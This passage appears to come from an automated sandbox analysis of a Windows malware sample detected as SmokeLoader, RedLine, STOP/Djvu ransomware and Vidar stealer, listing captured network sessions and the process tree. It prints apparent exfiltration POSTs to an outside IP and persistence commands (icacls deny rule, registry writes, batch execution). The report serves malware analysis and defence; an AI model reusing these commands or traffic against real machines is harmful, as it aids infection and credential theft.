47 6a 6b 37 53 46 63 68 6e 38 74 53 46 4a 44 4e 78 38 6f 39 54 79 4f 50 65 6a 6e 6a 61 39 77 39 6e 4e 4f 7a 57 6f 56 Data Ascii: pSsnO11fTS/wDmddevisRThTqJtQvZ2d9bb/cQ0UsSvO8aQRSytKxSMRxs29gMkDA5IHOPSlmjltpJI7iCeGSJQ8iyRMpRScAkEcDJHJrs9rC9ro5PY1Gr8rt6DaKR8xxLLIjpG+NrshCtnkYPQ0HKlAY5QXcRpmNvmYgEAcckhlOPQj1p+0h3F7Kp/K/uFpKCSrhHV0Y5wHQqTgkHr6EEfUGjk7SFchn8tSFJDNx8o9TyOPejnja9w9nNOzWoV
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 42 79 57 73 65 48 62 54 55 56 76 49 34 59 34 34 4a 6f 35 52 35 52 52 51 42 2f 71 30 4f 43 42 32 7a 58 6e 4e 7a 62 53 32 6c 77 38 45 36 46 4a 45 4f 43 44 58 73 38 2b 6c 32 46 31 4b 5a 5a 37 4f 43 57 51 39 57 65 4d 45 6d 76 4c 2f 46 30 45 56 74 34 6c 75 59 59 49 30 6a 6a 55 4a 68 45 47 41 50 6c 42 36 56 37 47 55 56 35 71 70 37 4c 6f 66 4f 35 2f 68 61 62 70 65 33 74 37 79 30 39 54 44 6f 6f 6f 72 36 4d 2b 50 45 78 52 52 52 51 4d 4b 53 6c 6f 6f 41 53 69 6c 6f 6f 41 53 69 69 69 67 42 4d 55 55 74 4a 33 6f 47 46 46 46 46 41 42 53 55 74 46 41 78 4b 4b 57 6b 70 67 4c 52 69 69 69 6b 41 6c 4a 33 70 61 4b 59 42 52 52 52 51 4d 53 69 69 69 67 41 4e 4a 53 30 6c 41 77 6f 6f 6f 6f 41 53 69 6c 70 4b 59 42 52 52 32 6f 70 41 46 4a 53 30 6c 41 77 6f 6f 6f 70 67 46 46 46 46 41 Data Ascii: ByWseHbTUVvI4Y44Jo5R5RRQB/q0OCB2zXnNzbS2lw8E6FJEOCDXs8+l2F1KZZ7OCWQ9WeMEmvL/F0EVt4luYYI0jjUJhEGAPlB6V7GUV5qp7LofO5/habpe3t7y09TDooor6M+PExRRRQMKSlooASilooASiiigBMUUtJ3oGFFFFABSUtFAxKKWkpgLRiiikAlJ3paKYBRRRQMSiiigANJS0lAwooooASilpKYBRR2opAFJS0lAwooopgFFFFA
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 57 6e 30 55 57 51 58 59 55 6c 4c 69 67 30 78 43 55 55 55 55 41 46 46 46 46 41 43 55 55 55 55 41 46 46 46 46 4d 41 6f 6f 6f 70 41 46 46 46 46 4d 41 70 4b 57 6b 6f 47 46 46 46 46 41 42 52 52 52 51 41 55 6c 4c 53 55 44 43 6b 70 61 4b 41 45 6f 6f 6f 6f 41 51 30 55 74 4a 51 4d 4b 4b 4b 4b 41 43 69 69 69 67 59 6c 46 47 4b 4b 59 43 47 6c 70 44 53 30 68 69 55 55 55 55 41 4a 52 53 34 70 4b 59 78 44 52 53 30 6c 41 42 53 55 74 4a 51 4d 4b 51 30 74 49 61 59 42 52 52 52 51 41 47 6b 70 61 54 76 54 47 46 46 46 46 49 42 4b 4b 4b 4b 59 77 4e 4a 53 6d 6b 6f 41 4b 4b 4b 4b 59 78 4b 4b 4b 4b 41 43 6b 70 61 4b 59 43 55 68 70 61 44 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 42 68 52 52 53 55 77 46 70 44 52 52 51 4d 4b 4b 4b 4b 41 45 4e 46 4b 61 53 67 61 44 2b 49 66 57 75 67 75 2f 38 Data Ascii: Wn0UWQXYUlLig0xCUUUUAFFFFACUUUUAFFFFMAooopAFFFFMApKWkoGFFFFABRRRQAUlLSUDCkpaKAEooooAQ0UtJQMKKKKACiiigYlFGKKYCGlpDS0hiUUUUAJRS4pKYxDRS0lABSUtJQMKQ0tIaYBRRRQAGkpaTvTGFFFFIBKKKKYwNJSmkoAKKKKYxKKKKACkpaKYCUhpaDQMSiiigBKKKKBhRRSUwFpDRRQMKKKKAENFKaSgaD+IfWugu/8
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 5a 4c 49 71 6a 2b 31 2b 48 6e 62 76 33 39 44 58 70 4b 77 46 31 65 61 30 74 4c 69 37 67 74 37 65 53 5a 4c 66 54 59 6f 30 6b 6a 56 6b 6a 4d 31 74 76 65 52 6c 50 44 45 6c 63 5a 49 49 79 78 50 58 46 57 6d 31 69 53 4f 33 47 6f 4e 61 32 37 58 4b 36 59 31 30 62 5a 56 41 6a 65 52 62 6a 79 52 4a 73 47 42 74 77 64 78 41 47 4d 71 65 4d 5a 46 4c 2b 31 61 64 72 74 50 38 41 34 4e 72 2f 41 4a 46 50 68 2b 73 70 4b 50 4d 72 75 7a 2b 54 30 4e 57 69 73 4d 65 49 56 68 69 30 75 39 31 4f 4b 43 4e 35 62 69 34 74 57 65 43 42 66 4c 4a 45 61 74 48 49 30 53 67 4b 77 52 6e 47 34 41 63 6a 48 42 36 47 37 62 7a 58 4b 7a 67 36 68 4c 59 6d 53 53 46 5a 45 6c 74 41 45 69 6d 51 39 48 56 51 46 78 30 78 39 30 48 49 35 47 63 31 74 52 78 30 61 6c 54 32 64 72 50 2b 76 36 2f 70 6e 4c 69 4d 71 6e Data Ascii: ZLIqj+1+Hnbv39DXpKwF1ea0tLi7gt7eSZLfTYo0kjVkjM1tveRlPDElcZIIyxPXFWm1iSO3GoNa27XK6Y10bZVAjeRbjyRJsGBtwdxAGMqeMZFL+1adrtP8A4Nr/AJFPh+spKPMruz+T0NWisMeIVhi0u91OKCN5bi4tWeCBfLJEatHI0SgKwRnG4AcjHB6G7bzXKzg6hLYmSSFZEltAEimQ9HVQFx0x90HI5Gc1tRx0alT2drP+v6/pnLiMqn
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 31 74 76 34 34 31 47 32 74 59 62 64 4c 65 30 4b 78 49 71 4b 57 56 73 6b 41 59 35 2b 61 70 50 2b 45 2f 31 54 2f 6e 32 73 76 2b 2b 48 2f 2b 4b 72 6a 30 6c 44 74 64 68 57 69 50 32 57 32 57 36 6b 4f 2f 67 78 73 41 77 78 78 79 64 70 7a 6a 6a 67 48 30 70 70 75 55 46 75 5a 39 38 57 78 56 68 59 71 48 4f 34 65 62 76 32 63 59 37 68 43 65 76 51 69 75 44 36 76 6c 2f 77 44 54 66 58 35 6e 71 2f 58 4d 34 31 33 30 76 30 6a 30 2b 52 32 50 2f 43 66 61 72 2f 7a 37 57 58 2f 66 44 2f 38 41 78 56 51 33 58 6a 62 55 37 75 7a 6e 74 6e 67 73 77 6b 30 62 52 73 56 52 73 67 45 59 4f 50 6d 39 36 35 52 70 38 52 68 78 35 62 5a 74 57 75 67 6f 59 37 69 69 79 69 4c 47 4d 64 64 78 48 46 54 42 57 61 4c 55 48 56 34 48 2f 73 39 59 7a 64 49 6b 68 4c 52 6c 73 2f 4c 30 77 53 75 30 35 77 65 50 66 Data Ascii: 1tv441G2tYbdLe0KxIqKWVskAY5+apP+E/1T/n2sv++H/+Krj0lDtdhWiP2W2W6kO/gxsAwxxydpzjjgH0ppuUFuZ98WxVhYqHO4ebv2cY7hCevQiuD6vl/wDTfX5nq/XM4130v0j0+R2P/Cfar/z7WX/fD/8AxVQ3XjbU7uzntngswk0bRsVRsgEYOPm965Rp8Rhx5bZtWugoY7iiyiLGMddxHFTBWaLUHV4H/s9YzdIkhLRls/L0wSu05wePf
2024-05-25 19:30:32 UTC	6491	OUT	Data Raw: 4d 49 72 64 37 71 63 46 64 78 58 43 5a 69 42 79 47 2b 59 67 44 61 4f 63 48 6d 67 44 72 36 4b 34 65 44 57 4e 61 6e 73 6f 37 55 33 55 31 76 63 6a 56 2f 73 54 53 7a 52 77 6d 58 79 7a 47 58 2b 59 4a 6d 50 63 4d 39 52 78 77 4d 6a 71 4b 30 37 51 36 6c 71 65 70 33 38 43 61 76 63 57 38 4f 6d 79 70 62 6a 62 46 45 57 75 47 32 4b 37 50 4a 6c 4f 68 33 41 41 4a 74 36 48 32 77 4c 58 2b 76 54 2f 4e 42 2f 58 39 66 63 64 46 46 4e 46 4f 47 4d 55 71 53 42 57 4b 4d 55 59 48 44 44 67 67 2b 34 39 4b 66 58 42 77 7a 36 68 70 30 4e 31 71 4d 56 2b 79 77 4c 72 6a 51 74 61 43 4a 43 6a 6f 38 77 52 69 78 49 33 62 73 74 6b 45 45 44 67 63 48 6d 75 38 6f 57 73 55 2f 36 32 54 2f 55 48 75 30 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 Data Ascii: MIrd7qcFdxXCZiByG+YgDaOcHmgDr6K4eDWNanso7U3U1vcjV/sTSzRwmXyzGX+YJmPcM9RxwMjqK07Q6lqep38CavcW8OmypbjbFEWuG2K7PJlOh3AAJt6H2wLX+vT/NB/X9fcdFFNFOGMUqSBWKMUYHDDgg+49KfXBwz6hp0N1qMV+ywLrjQtaCJCjo8wRixI3bstkEEDgcHmu8oWsU/62T/UHu0FFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF
2024-05-25 19:30:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49813	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:34 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHJECFCGHIDGHIDHDHIECont
2024-05-25 19:30:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49814	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:36 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHCBAEHJJJKKFIDGHJECCont
2024-05-25 19:30:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:28:56
Start date:	25/05/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	240'128 bytes
MD5 hash:	A25AC46E5BEA920465D1838177782E5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:29:01
Start date:	25/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:29:23
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Roaming\rujtcgu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rujtcgu
Imagebase:	0x400000
File size:	240'128 bytes
MD5 hash:	A25AC46E5BEA920465D1838177782E5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:29:25
Start date:	25/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
Imagebase:	0x7ff729c50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:29:25
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:29:25
Start date:	25/05/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Imagebase:	0x1b0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:29:35
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\E609.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E609.exe
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:29:35
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\E609.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E609.exe
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:29:37
Start date:	25/05/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:29:37
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:29:38
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	15:29:39
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:29:40
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:29:42
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Imagebase:	0x400000
File size:	232'448 bytes
MD5 hash:	4F54B83888A62CDD3584C0A0FEE970D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:29:43
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Imagebase:	0x400000
File size:	232'448 bytes
MD5 hash:	4F54B83888A62CDD3584C0A0FEE970D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:29:44
Start date:	25/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" "
Imagebase:	0x7ff729c50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	15:29:44
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	15:29:44
Start date:	25/05/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Imagebase:	0x7ff714330000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	15:29:46
Start date:	25/05/2024
